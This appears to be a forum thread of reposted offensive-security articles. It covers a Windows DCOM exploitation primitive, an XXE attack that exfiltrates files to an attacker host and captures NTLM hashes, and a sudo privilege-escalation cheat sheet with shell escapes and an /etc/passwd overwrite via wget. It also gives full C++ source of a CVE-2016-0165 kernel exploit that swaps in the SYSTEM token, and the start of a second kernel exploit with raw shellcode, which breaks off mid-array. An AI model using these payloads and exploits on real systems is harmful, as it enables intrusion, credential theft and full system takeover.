AccessChk utility, but to be 100% certain that the Storage Service’s token can modify the file we’ll use my NtObjectManager PowerShell module (specifically its Get-AccessibleFile cmdlet, which accepts a process to do the access check from). While the module was designed for checking accessible files from a sandbox, it also works to check for files accessible by privileged services. If you run the following script as an administrator with the module installed the $files variable will contain a list of files that the Storage Service has WRITE_DAC access to. Import-Module NtObjectManager Start-Service -Name "StorSvc" Set-NtTokenPrivilege SeDebugPrivilege | Out-Null $files = Use-NtObject($p = Get-NtProcess -ServiceName "StorSvc") { Get-AccessibleFile -Win32Path C:\Windows\system32 -Recurse ` -MaxDepth 1 -FormatWin32Path -AccessRights WriteDac -CheckMode FilesOnly } Looking through the list of files I decided to pick on the file license.rtf, which contains a short license statement for Windows. The advantage of this file is it’s very likely to be not be critical to the operation of the system and so overwriting it shouldn’t cause the installation to become corrupted. So putting it all together: Use the Storage Service vulnerability to change the security of the license.rtf file inside SYSTEM32. Copy a DLL, which implements DllGetClassObject over the license.rtf file. Use the DiagHub service to load our modified license file as a DLL, get code execution as Local System and do whatever we want. If you’re interested in seeing a fully working example, I’ve uploaded a full exploit to the original issue on the tracker. Wrapping Up In this blog post I’ve described a useful exploit primitive for Windows 10, which you can even use from some sandboxed environments such as Edge LPAC. Finding these sorts of primitives makes exploitation much simpler and less error-prone. Also I’ve given you a taste of how you can go about finding your own bugs in similar DCOM implementations. Sursa: https://googleprojectzero.blogspot.ro/2018/04/windows-exploitation-tricks-exploiting.html?m=1
-
From XML External Entity to NTLM Domain Hashes Older On 2 Feb, 2018 By Gianluca Baldi During this article I will show how it is possible to obtain NTLM password hashes from a Windows Web Server by chaining some well-known web vulnerabilities with internal network misconfigurations. (nothing surprisingly new, a very good read about this topic). But: This article inspired this work during one of our last penetration tests. To respect our non-disclosure agreement with the customer, the “evidences” in the article have been (poorly) “crafted” to reproduce the original behavior encountered during the tests. Walkthrough the attack Our target was a bunch of ASP.NET APIs exposed on the Internet running on a Windows Server. After some tests, we found that the service was vulnerable to XXE ( XXE on OWASP ) due to a DNS interaction when feeding the service with XML external entities. Usually, one of the best thing you can get from this kind of vulnerability (except for rare cases – like the PHP expect module that gives RCE directly), is to read files that the Application Server account has privilege to read. If you are lucky enough, you can simply use your external entity to retrieve the content of the file directly putting your external enity in a field that is reflected back in the server response. Unfortunately, none of the fields in the XML could be used to retrieve directly the content of the file from the server response in our scenario, beacuse the external entity injection caused 500 Error code responses (but the entities were still parsed). This is the case where you need some Out-Of-Band data retrieval technique to exfiltrate file contents. In few words, we need to find another way to retrieve the content of the file because we can’t see it directly in the server response: in those cases, for example, you can try to force the backend to send the file content to a server you control via HTTP/FTP/DNS request. To achieve our goal, however, we need to use an external DTD (the external DTD is an external XML where you can define new entities definitions for your XML schema) because we need parametric entities in our request (and parametric entities reference is not allowed in internal markup). We need to put our DTD in a place we control and where the server could read it, like on a public host on the internet. But no one can assure us that the vulnerable backend server, behind a load balancer, could reach our file on the public network on a useful protocol. Let’s verify this, using the Burp collaborator (and, of course, our super-sweet Handy Collaborator plugin): <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY % xxe SYSTEM "http://58bjzmpi1n4usspzku5z0h4z9qfj38.burpcollaborator.net/">%xxe; ]> <xml></xml> 1 2 3 4 5 6 7 <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY % xxe SYSTEM "http://58bjzmpi1n4usspzku5z0h4z9qfj38.burpcollaborator.net/">%xxe; ]> <xml></xml> And…. This means two things: An external public server can be reached on the HTTP port, so we can procede with the exfiltration using the external DTD We just found a Server-Side Request Forgery (SSRF) vulnerability aswell 🙂 Let’s see how we can exploit this. The first thing is to host our external DTD (with parametric entities) on the Internet and then request it using our XXE vulnerability via HTTP request: File xxe.xml: <!ENTITY % payl SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://xxe.evilserver.xxx/%payl;'>"> 1 2 3 <!ENTITY % payl SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://xxe.evilserver.xxx/%payl;'>"> Request: <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY % xxe SYSTEM "http://xxe.evilserver.xxx/exfil.dtd">%xxe;%param1;%exfil; ]> <xml></xml> 1 2 3 4 5 <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY % xxe SYSTEM "http://xxe.evilserver.xxx/exfil.dtd">%xxe;%param1;%exfil; ]> <xml></xml> Nice, we got the file from the server via GET request to our host. But this technique is not very efficient, due to the fact that some characters in the file content can break the HTTP syntax (and URL max-lengh is a limit to the file size), so not all files can be retrieved in this way. A more flexible way to retrieve files is the FTP protocol (SYSTEM ftp://xxe.evilserver.xxx/%payl; – supported by .NET parser) , available only if the outbound traffic on the FTP ports is not filtered by the internal network routing. The easier way to verify this is to modify our DTD and use a tcpdump filter on our server and see if something is happening. New exfil.dtd: <!ENTITY % payl SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'ftp://xxe.evilserver.xxx/%payl;'>"> 1 2 <!ENTITY % payl SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'ftp://xxe.evilserver.xxx/%payl;'>"> ….And surprisingly: Wow, the FTP protocol isn’t filtered by outbound rules! Nice, but pretty strange… After some investigations, we found out that the backend server could reach any arbitrary port number on the Internet using the FTP or the HTTP URL schema in our XXE payload. Another “protocol” supported by almost every XML processor is “file://” which can be used to refer local files on the system (like we did before in our external DTD to fetch the win.ini) but it can also refer files on network sahres identified by UNC paths. So, what will happen if we use a URL like “file://xxe.evilserver.xxx/somefile.txt” and host a – DEFINITELY NOT ROGUE – network share on the Internet ? Let’s fire up the handy Metasploit module auxiliary/server/capture/smb (you can use Responder.py as well): This module simulate an authenticated SMB service and capture the challenges (Net-NTLM hashes) issued from the clients that tries to connect to it. The idea is to force the vulnerable server to connect and (hopefully) authenticate on our evil SMB server and grab the hashes. Modify our XXE payload to file://evilserver.net/funny.txt … aaaand it works! 😀 Enjoy! Sursa: https://techblog.mediaservice.net/2018/02/from-xml-external-entity-to-ntlm-domain-hashes/
-
Abusing SUDO (Linux Privilege Escalation) Published by Touhid Shaikh on April 11, 2018 If you have a limited shell that has access to some programs using the commandsudo you might be able to escalate your privileges. here I show some of the binary which helps you to escalate privilege using the sudo command. But before Privilege Escalation let’s understand some sudoer file syntax and what is sudo command is? ;). Index What is SUDO? Sudoer FIle Syntax. Exploiting SUDO user /usr/bin/find /usr/bin/nano /usr/bin/vim /usr/bin/man /usr/bin/awk /usr/bin/less /usr/bin/nmap ( –interactive and –script method) /bin/more /usr/bin/wget /usr/sbin/apache2 What is SUDO ?? The SUDO(Substitute User and Do) command, allows users to delegate privileges resources proceeding activity logging. In other words, users can execute command under root ( or other users) using their own passwords instead of root’s one or without password depending upon sudoers setting The rules considering the decision making about granting an access, we can find in /etc/sudoers file. Sudoer File Syntax. root ALL=(ALL) ALL Explain 1: The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command. The first part is the user, the second is the terminal from where the user can use the sudocommand, the third part is which users he may act as, and the last one is which commands he may run when using.sudo touhid ALL= /sbin/poweroff Explain 2: The above command, makes the user touhid can from any terminal, run the command power off using touhid’s user password. touhid ALL = (root) NOPASSWD: /usr/bin/find Explain 3: The above command, make the user touhid can from any terminal, run the command find as root user without password. Exploiting SUDO Users. To Exploiting sudo user u need to find which command u have to allow. sudo -l The above command shows which command have allowed to the current user. Here sudo -l, Shows the user has all this binary allowed to do as on root user without password. Let’s take a look at all binary one by one (which is mention in index only) and Escalate Privilege to root user. Using Find Command sudo find /etc/passwd -exec /bin/sh \; or sudo find /bin -name nano -exec /bin/sh \; Using Vim Command sudo vim -c '!sh' Using Nmap Command Old way. sudo nmap --interactive nmap> !sh sh-4.1# Note : nmap –interactive option not available in latest nmap. Latest Way without –interactive echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse Using Man Command sudo man man after that press !sh and hit enter Using Less/More Command sudo less /etc/hosts sudo more /etc/hosts after that press !sh and hit enter Using awk Command sudo awk 'BEGIN {system("/bin/sh")}' Using nano Command nano is text editor using this editor u can modify passwd file and add a user in passwd file as root privilege after that u need to switch user. Add this line in /etc/passwd to order to add the user as root privilege. touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash sudo nano /etc/passwd now switch user password is : test su touhid Using wget Command this very cool way which requires a Web Server to download a file. This way i never saw on anywhere. lets explain this. On Attaker Side. First Copy Target’s /etc/passwd file to attacker machine. modify file and add a user in passwd file which is saved in the previous step to the attacker machine. append this line only => touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash host that passwd file to using any web server. On Victim Side. sudo wget http://192.168.56.1:8080/passwd -O /etc/passwd now switch user password is : test su touhid Using apache Command sadly u cant get Shell and Cant edit system files. but using this u can view system files. sudo apache2 -f /etc/shadow Output is like this : Syntax error on line 1 of /etc/shadow: Invalid command 'root:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:17298:0:99999:7:::', perhaps misspelled or defined by a module not included in the server configuration Sadly no Shell. But you manage to extract root hash now Crack hash in your machine. For Shadow Cracking click here for more. Sursa: http://touhidshaikh.com/blog/?p=790
-
#include <Windows.h> #include <wingdi.h> #include <iostream> #include <Psapi.h> #pragma comment(lib, "psapi.lib") #define POCDEBUG 0 #if POCDEBUG == 1 #define POCDEBUG_BREAK() getchar() #elif POCDEBUG == 2 #define POCDEBUG_BREAK() DebugBreak() #else #define POCDEBUG_BREAK() #endif static HBITMAP hBmpHunted = NULL; static HBITMAP hBmpExtend = NULL; static DWORD iMemHunted = NULL; static PDWORD pBmpHunted = NULL; CONST LONG maxCount = 0x6666667; CONST LONG maxLimit = 0x04E2000; CONST LONG maxTimes = 4000; CONST LONG tmpTimes = 5500; static POINT point[maxCount] = { 0, 0 }; static HBITMAP hbitmap[maxTimes] = { NULL }; static HACCEL hacctab[tmpTimes] = { NULL }; CONST LONG iExtHeight = 948; CONST LONG iExtpScan0 = 951; static VOID xxCreateClipboard(DWORD Size) { PBYTE Buffer = (PBYTE)malloc(Size); FillMemory(Buffer, Size, 0x41); Buffer[Size - 1] = 0x00; HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, (SIZE_T)Size); CopyMemory(GlobalLock(hMem), Buffer, (SIZE_T)Size); GlobalUnlock(hMem); SetClipboardData(CF_TEXT, hMem); } static BOOL xxPoint(LONG id, DWORD Value) { LONG iLeng = 0x00; pBmpHunted[id] = Value; iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted); if (iLeng < 0x1000) { return FALSE; } return TRUE; } static BOOL xxPointToHit(LONG addr, PVOID pvBits, DWORD cb) { LONG iLeng = 0; pBmpHunted[iExtpScan0] = addr; iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted); if (iLeng < 0x1000) { return FALSE; } iLeng = SetBitmapBits(hBmpExtend, cb, pvBits); if (iLeng < (LONG)cb) { return FALSE; } return TRUE; } static BOOL xxPointToGet(LONG addr, PVOID pvBits, DWORD cb) { LONG iLeng = 0; pBmpHunted[iExtpScan0] = addr; iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted); if (iLeng < 0x1000) { return FALSE; } iLeng = GetBitmapBits(hBmpExtend, cb, pvBits); if (iLeng < (LONG)cb) { return FALSE; } return TRUE; } static VOID xxInitPoints(VOID) { for (LONG i = 0; i < maxCount; i++) { point[i].x = (i % 2) + 1; point[i].y = 100; } for (LONG i = 0; i < 75; i++) { point[i].y = i + 1; } } static BOOL xxDrawPolyLines(HDC hdc) { for (LONG i = maxCount; i > 0; i -= min(maxLimit, i)) { // std::cout << ":" << (PVOID)i << std::endl; if (!PolylineTo(hdc, &point[maxCount - i], min(maxLimit, i))) { return FALSE; } } return TRUE; } static BOOL xxCreateBitmaps(INT nWidth, INT Height, UINT nbitCount) { POCDEBUG_BREAK(); for (LONG i = 0; i < maxTimes; i++) { hbitmap[i] = CreateBitmap(nWidth, Height, 1, nbitCount, NULL); if (hbitmap[i] == NULL) { return FALSE; } } return TRUE; } static BOOL xxCreateAcceleratorTables(VOID) { POCDEBUG_BREAK(); for (LONG i = 0; i < tmpTimes; i++) { ACCEL acckey[0x0D] = { 0 }; hacctab[i] = CreateAcceleratorTableA(acckey, 0x0D); if (hacctab[i] == NULL) { return FALSE; } } return TRUE; } static BOOL xxDeleteBitmaps(VOID) { BOOL bReturn = FALSE; POCDEBUG_BREAK(); for (LONG i = 0; i < maxTimes; i++) { bReturn = DeleteObject(hbitmap[i]); hbitmap[i] = NULL; } return bReturn; } static VOID xxCreateClipboards(VOID) { POCDEBUG_BREAK(); for (LONG i = 0; i < maxTimes; i++) { xxCreateClipboard(0xB5C); } } static BOOL xxDigHoleInAcceleratorTables(LONG b, LONG e) { BOOL bReturn = FALSE; for (LONG i = b; i < e; i++) { bReturn = DestroyAcceleratorTable(hacctab[i]); hacctab[i] = NULL; } return bReturn; } static VOID xxDeleteAcceleratorTables(VOID) { for (LONG i = 0; i < tmpTimes; i++) { if (hacctab[i] == NULL) { continue; } DestroyAcceleratorTable(hacctab[i]); hacctab[i] = NULL; } } static BOOL xxRetrieveBitmapBits(VOID) { pBmpHunted = static_cast<PDWORD>(malloc(0x1000)); ZeroMemory(pBmpHunted, 0x1000); LONG index = -1; LONG iLeng = -1; POCDEBUG_BREAK(); for (LONG i = 0; i < maxTimes; i++) { iLeng = GetBitmapBits(hbitmap[i], 0x1000, pBmpHunted); if (iLeng < 0x2D0) { continue; } index = i; std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl; hBmpHunted = hbitmap[i]; break; } if (index == -1) { std::cout << "FAILED: " << (PVOID)(-1) << std::endl; return FALSE; } return TRUE; } static BOOL xxGetExtendPalette(VOID) { PVOID pBmpExtend = malloc(0x1000); LONG index = -1; POCDEBUG_BREAK(); for (LONG i = 0; i < maxTimes; i++) { if (hbitmap[i] == hBmpHunted) { continue; } if (GetBitmapBits(hbitmap[i], 0x1000, pBmpExtend) < 0x2D0) { continue; } index = i; std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl; hBmpExtend = hbitmap[i]; break; } free(pBmpExtend); pBmpExtend = NULL; if (index == -1) { std::cout << "FAILED: " << (PVOID)(-1) << std::endl; return FALSE; } return TRUE; } static VOID xxOutputBitmapBits(VOID) { POCDEBUG_BREAK(); for (LONG i = 0; i < 0x1000 / sizeof(DWORD); i++) { std::cout << '['; std::cout.fill('0'); std::cout.width(4); std::cout << i << ']' << (PVOID)pBmpHunted[i]; if (((i + 1) % 4) != 0) { std::cout << " "; } else { std::cout << std::endl; } } std::cout.width(0); } static BOOL xxFixHuntedPoolHeader(VOID) { DWORD szInputBit[0x100] = { 0 }; CONST LONG iTrueCbdHead = 205; CONST LONG iTrueBmpHead = 937; szInputBit[0] = pBmpHunted[iTrueCbdHead + 0]; szInputBit[1] = pBmpHunted[iTrueCbdHead + 1]; BOOL bReturn = FALSE; bReturn = xxPointToHit(iMemHunted + 0x000, szInputBit, 0x08); if (!bReturn) { return FALSE; } szInputBit[0] = pBmpHunted[iTrueBmpHead + 0]; szInputBit[1] = pBmpHunted[iTrueBmpHead + 1]; bReturn = xxPointToHit(iMemHunted + 0xb70, szInputBit, 0x08); if (!bReturn) { return FALSE; } return TRUE; } static BOOL xxFixHuntedBitmapObject(VOID) { DWORD szInputBit[0x100] = { 0 }; szInputBit[0] = (DWORD)hBmpHunted; BOOL bReturn = FALSE; bReturn = xxPointToHit(iMemHunted + 0xb78, szInputBit, 0x04); if (!bReturn) { return FALSE; } bReturn = xxPointToHit(iMemHunted + 0xb8c, szInputBit, 0x04); if (!bReturn) { return FALSE; } return TRUE; } static DWORD_PTR xxGetNtoskrnlAddress(VOID) { DWORD_PTR AddrList[500] = { 0 }; DWORD cbNeeded = 0; EnumDeviceDrivers((LPVOID *)&AddrList, sizeof(AddrList), &cbNeeded); return AddrList[0]; } static DWORD_PTR xxGetSysPROCESS(VOID) { DWORD_PTR Module = 0x00; DWORD_PTR NtAddr = 0x00; Module = (DWORD_PTR)LoadLibraryA("ntkrnlpa.exe"); NtAddr = (DWORD_PTR)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess"); FreeLibrary((HMODULE)Module); NtAddr = NtAddr - Module; Module = xxGetNtoskrnlAddress(); if (Module == 0x00) { return 0x00; } NtAddr = NtAddr + Module; if (!xxPointToGet(NtAddr, &NtAddr, sizeof(DWORD_PTR))) { return 0x00; } return NtAddr; } CONST LONG off_EPROCESS_UniqueProId = 0x0b4; CONST LONG off_EPROCESS_ActiveLinks = 0x0b8; static DWORD_PTR xxGetTarPROCESS(DWORD_PTR SysPROC) { if (SysPROC == 0x00) { return 0x00; } DWORD_PTR point = SysPROC; DWORD_PTR value = 0x00; do { value = 0x00; xxPointToGet(point + off_EPROCESS_UniqueProId, &value, sizeof(DWORD_PTR)); if (value == 0x00) { break; } if (value == GetCurrentProcessId()) { return point; } value = 0x00; xxPointToGet(point + off_EPROCESS_ActiveLinks, &value, sizeof(DWORD_PTR)); if (value == 0x00) { break; } point = value - off_EPROCESS_ActiveLinks; if (point == SysPROC) { break; } } while (TRUE); return 0x00; } CONST LONG off_EPROCESS_Token = 0x0f8; static DWORD_PTR dstToken = 0x00; static DWORD_PTR srcToken = 0x00; static BOOL xxModifyTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC) { if (dstPROC == 0x00 || srcPROC == 0x00) { return FALSE; } // get target process original token pointer xxPointToGet(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR)); if (dstToken == 0x00) { return FALSE; } // get system process token pointer xxPointToGet(srcPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR)); if (srcToken == 0x00) { return FALSE; } // modify target process token pointer to system xxPointToHit(dstPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR)); // just test if the modification is successful DWORD_PTR tmpToken = 0x00; xxPointToGet(dstPROC + off_EPROCESS_Token, &tmpToken, sizeof(DWORD_PTR)); if (tmpToken != srcToken) { return FALSE; } return TRUE; } static BOOL xxRecoverTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC) { if (dstPROC == 0x00 || srcPROC == 0x00) { return FALSE; } if (dstToken == 0x00 || srcToken == 0x00) { return FALSE; } // recover the original token pointer to target process xxPointToHit(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR)); return TRUE; } static VOID xxCreateCmdLineProcess(VOID) { STARTUPINFO si = { sizeof(si) }; PROCESS_INFORMATION pi = { 0 }; si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOW; WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" }; BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess); } static VOID xxPrivilegeElevation(VOID) { BOOL bReturn = FALSE; do { DWORD SysPROC = 0x0; DWORD TarPROC = 0x0; POCDEBUG_BREAK(); SysPROC = xxGetSysPROCESS(); if (SysPROC == 0x00) { break; } std::cout << "SYSTEM PROCESS: " << (PVOID)SysPROC << std::endl; POCDEBUG_BREAK(); TarPROC = xxGetTarPROCESS(SysPROC); if (TarPROC == 0x00) { break; } std::cout << "TARGET PROCESS: " << (PVOID)TarPROC << std::endl; POCDEBUG_BREAK(); bReturn = xxModifyTokenPointer(TarPROC, SysPROC); if (!bReturn) { break; } std::cout << "MODIFIED TOKEN TO SYSTEM!" << std::endl; std::cout << "CREATE NEW CMDLINE PROCESS..." << std::endl; POCDEBUG_BREAK(); xxCreateCmdLineProcess(); POCDEBUG_BREAK(); std::cout << "RECOVER TOKEN..." << std::endl; bReturn = xxRecoverTokenPointer(TarPROC, SysPROC); if (!bReturn) { break; } bReturn = TRUE; } while (FALSE); if (!bReturn) { std::cout << "FAILED" << std::endl; } } INT POC_CVE20160165(VOID) { std::cout << "-------------------" << std::endl; std::cout << "POC - CVE-2016-0165" << std::endl; std::cout << "-------------------" << std::endl; BOOL bReturn = FALSE; do { std::cout << "INIT POINTS..." << std::endl; xxInitPoints(); HDC hdc = GetDC(NULL); std::cout << "GET DEVICE CONTEXT: " << hdc << std::endl; if (hdc == NULL) { bReturn = FALSE; break; } std::cout << "BEGIN DC PATH..." << std::endl; bReturn = BeginPath(hdc); if (!bReturn) { break; } std::cout << "DRAW POLYLINES..." << std::endl; bReturn = xxDrawPolyLines(hdc); if (!bReturn) { break; } std::cout << "ENDED DC PATH..." << std::endl; bReturn = EndPath(hdc); if (!bReturn) { break; } std::cout << "CREATE BITMAPS (1)..." << std::endl; bReturn = xxCreateBitmaps(0xE34, 0x01, 8); if (!bReturn) { break; } std::cout << "CREATE ACCTABS (1)..." << std::endl; bReturn = xxCreateAcceleratorTables(); if (!bReturn) { break; } std::cout << "DELETE BITMAPS (1)..." << std::endl; xxDeleteBitmaps(); std::cout << "CREATE CLIPBDS (1)..." << std::endl; xxCreateClipboards(); std::cout << "CREATE BITMAPS (2)..." << std::endl; bReturn = xxCreateBitmaps(0x01, 0xB1, 32); std::cout << "DELETE ACCTABS (H)..." << std::endl; xxDigHoleInAcceleratorTables(2000, 4000); std::cout << "PATH TO REGION..." << std::endl; POCDEBUG_BREAK(); HRGN hrgn = PathToRegion(hdc); if (hrgn == NULL) { bReturn = FALSE; break; } std::cout << "DELETE REGION..." << std::endl; DeleteObject(hrgn); std::cout << "LOCATE HUNTED BITMAP..." << std::endl; bReturn = xxRetrieveBitmapBits(); if (!bReturn) { break; } // std::cout << "OUTPUT BITMAP BITS..." << std::endl; // xxOutputBitmapBits(); std::cout << "MODIFY EXTEND BITMAP HEIGHT..." << std::endl; POCDEBUG_BREAK(); bReturn = xxPoint(iExtHeight, 0xFFFFFFFF); if (!bReturn) { break; } std::cout << "LOCATE EXTEND BITMAP..." << std::endl; bReturn = xxGetExtendPalette(); if (!bReturn) { break; } if ((pBmpHunted[iExtpScan0] & 0xFFF) != 0x00000CCC) { bReturn = FALSE; std::cout << "FAILED: " << (PVOID)pBmpHunted[iExtpScan0] << std::endl; break; } iMemHunted = (pBmpHunted[iExtpScan0] & ~0xFFF) - 0x1000; std::cout << "HUNTED PAGE: " << (PVOID)iMemHunted << std::endl; std::cout << "FIX HUNTED POOL HEADER..." << std::endl; bReturn = xxFixHuntedPoolHeader(); if (!bReturn) { break; } std::cout << "FIX HUNTED BITMAP OBJECT..." << std::endl; bReturn = xxFixHuntedBitmapObject(); if (!bReturn) { break; } std::cout << "-------------------" << std::endl; std::cout << "PRIVILEGE ELEVATION" << std::endl; std::cout << "-------------------" << std::endl; xxPrivilegeElevation(); std::cout << "-------------------" << std::endl; std::cout << "DELETE BITMAPS (2)..." << std::endl; xxDeleteBitmaps(); std::cout << "DELETE ACCTABS (3)..." << std::endl; xxDeleteAcceleratorTables(); bReturn = TRUE; } while (FALSE); if (!bReturn) { std::cout << GetLastError() << std::endl; } std::cout << "-------------------" << std::endl; getchar(); return 0; } INT main(INT argc, CHAR *argv[]) { POC_CVE20160165(); return 0; } Sursa: https://www.exploit-db.com/exploits/44480/?rss&utm_source=dlvr.it&utm_medium=twitter
-
#include <Windows.h> #include <wingdi.h> #include <iostream> #include <Psapi.h> #pragma comment(lib, "psapi.lib") #define POCDEBUG 0 #if POCDEBUG == 1 #define POCDEBUG_BREAK() getchar() #elif POCDEBUG == 2 #define POCDEBUG_BREAK() DebugBreak() #else #define POCDEBUG_BREAK() #endif static PVOID(__fastcall *pfnHMValidateHandle)(HANDLE, BYTE) = NULL; static constexpr UINT num_PopupMenuCount = 2; static constexpr UINT num_WndShadowCount = 3; static constexpr UINT num_NtUserMNDragLeave = 0x11EC; static constexpr UINT num_offset_WND_pcls = 0x64; static HMENU hpopupMenu[num_PopupMenuCount] = { 0 }; static UINT iMenuCreated = 0; static BOOL bDoneExploit = FALSE; static DWORD popupMenuRoot = 0; static HWND hWindowMain = NULL; static HWND hWindowHunt = NULL; static HWND hWindowList[0x100] = { 0 }; static UINT iWindowCount = 0; static PVOID pvHeadFake = NULL; static PVOID pvAddrFlags = NULL; typedef struct _HEAD { HANDLE h; DWORD cLockObj; } HEAD, *PHEAD; typedef struct _THROBJHEAD { HEAD head; PVOID pti; } THROBJHEAD, *PTHROBJHEAD; typedef struct _DESKHEAD { PVOID rpdesk; PBYTE pSelf; } DESKHEAD, *PDESKHEAD; typedef struct _THRDESKHEAD { THROBJHEAD thread; DESKHEAD deskhead; } THRDESKHEAD, *PTHRDESKHEAD; typedef struct _SHELLCODE { DWORD reserved; DWORD pid; DWORD off_CLS_lpszMenuName; DWORD off_THREADINFO_ppi; DWORD off_EPROCESS_ActiveLink; DWORD off_EPROCESS_Token; PVOID tagCLS[0x100]; BYTE pfnWindProc[]; } SHELLCODE, *PSHELLCODE; static PSHELLCODE pvShellCode = NULL; // Arguments: // [ebp+08h]:pwnd = pwndWindowHunt; // [ebp+0Ch]:msg = 0x9F9F; // [ebp+10h]:wParam = popupMenuRoot; // [ebp+14h]:lParam = NULL; // In kernel-mode, the first argument is tagWND pwnd. static BYTE xxPayloadWindProc[] = { // Loader+0x108a: // Judge if the `msg` is 0x9f9f value. 0x55, // push ebp 0x8b, 0xec, // mov ebp,esp 0x8b, 0x45, 0x0c, // mov eax,dword ptr [ebp+0Ch] 0x3d, 0x9f, 0x9f, 0x00, 0x00, // cmp eax,9F9Fh 0x0f, 0x85, 0x8d, 0x00, 0x00, 0x00, // jne Loader+0x1128 // Loader+0x109b: // Judge if CS is 0x1b, which means in user-mode context. 0x66, 0x8c, 0xc8, // mov ax,cs 0x66, 0x83, 0xf8, 0x1b, // cmp ax,1Bh 0x0f, 0x84, 0x80, 0x00, 0x00, 0x00, // je Loader+0x1128 // Loader+0x10a8: // Get the address of pwndWindowHunt to ECX. // Recover the flags of pwndWindowHunt: zero bServerSideWindowProc. // Get the address of pvShellCode to EDX by CALL-POP. // Get the address of pvShellCode->tagCLS[0x100] to ESI. // Get the address of popupMenuRoot to EDI. 0xfc, // cld 0x8b, 0x4d, 0x08, // mov ecx,dword ptr [ebp+8] 0xff, 0x41, 0x16, // inc dword ptr [ecx+16h] 0x60, // pushad 0xe8, 0x00, 0x00, 0x00, 0x00, // call $5 0x5a, // pop edx 0x81, 0xea, 0x43, 0x04, 0x00, 0x00, // sub edx,443h 0xbb, 0x00, 0x01, 0x00, 0x00, // mov ebx,100h 0x8d, 0x72, 0x18, // lea esi,[edx+18h] 0x8b, 0x7d, 0x10, // mov edi,dword ptr [ebp+10h] // Loader+0x10c7: 0x85, 0xdb, // test ebx,ebx 0x74, 0x13, // je Loader+0x10de // Loader+0x10cb: // Judge if pvShellCode->tagCLS[ebx] == NULL 0xad, // lods dword ptr [esi] 0x4b, // dec ebx 0x83, 0xf8, 0x00, // cmp eax,0 0x74, 0xf5, // je Loader+0x10c7 // Loader+0x10d2: // Judge if tagCLS->lpszMenuName == popupMenuRoot 0x03, 0x42, 0x08, // add eax,dword ptr [edx+8] 0x39, 0x38, // cmp dword ptr [eax],edi 0x75, 0xee, // jne Loader+0x10c7 // Loader+0x10d9: // Zero tagCLS->lpszMenuName 0x83, 0x20, 0x00, // and dword ptr [eax],0 0xeb, 0xe9, // jmp Loader+0x10c7 // Loader+0x10de: // Get the value of pwndWindowHunt->head.pti->ppi->Process to ECX. // Get the value of pvShellCode->pid to EAX. 0x8b, 0x49, 0x08, // mov ecx,dword ptr [ecx+8] 0x8b, 0x5a, 0x0c, // mov ebx,dword ptr [edx+0Ch] 0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx] 0x8b, 0x09, // mov ecx,dword ptr [ecx] 0x8b, 0x5a, 0x10, // mov ebx,dword ptr [edx+10h] 0x8b, 0x42, 0x04, // mov eax,dword ptr [edx+4] 0x51, // push ecx // Loader+0x10f0: // Judge if EPROCESS->UniqueId == pid. 0x39, 0x44, 0x0b, 0xfc, // cmp dword ptr [ebx+ecx-4],eax 0x74, 0x07, // je Loader+0x10fd // Loader+0x10f6: // Get next EPROCESS to ECX by ActiveLink. 0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx] 0x2b, 0xcb, // sub ecx,ebx 0xeb, 0xf3, // jmp Loader+0x10f0 // Loader+0x10fd: // Get current EPROCESS to EDI. 0x8b, 0xf9, // mov edi,ecx 0x59, // pop ecx // Loader+0x1100: // Judge if EPROCESS->UniqueId == 4 0x83, 0x7c, 0x0b, 0xfc, 0x04, // cmp dword ptr [ebx+ecx-4],4 0x74, 0x07, // je Loader+0x110e // Loader+0x1107: // Get next EPROCESS to ECX by ActiveLink. 0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx] 0x2b, 0xcb, // sub ecx,ebx 0xeb, 0xf2, // jmp Loader+0x1100 // Loader+0x110e: // Get system EPROCESS to ESI. // Get the value of system EPROCESS->Token to current EPROCESS->Token. // Add 2 to OBJECT_HEADER->PointerCount of system Token. // Return 0x9F9F to the caller. 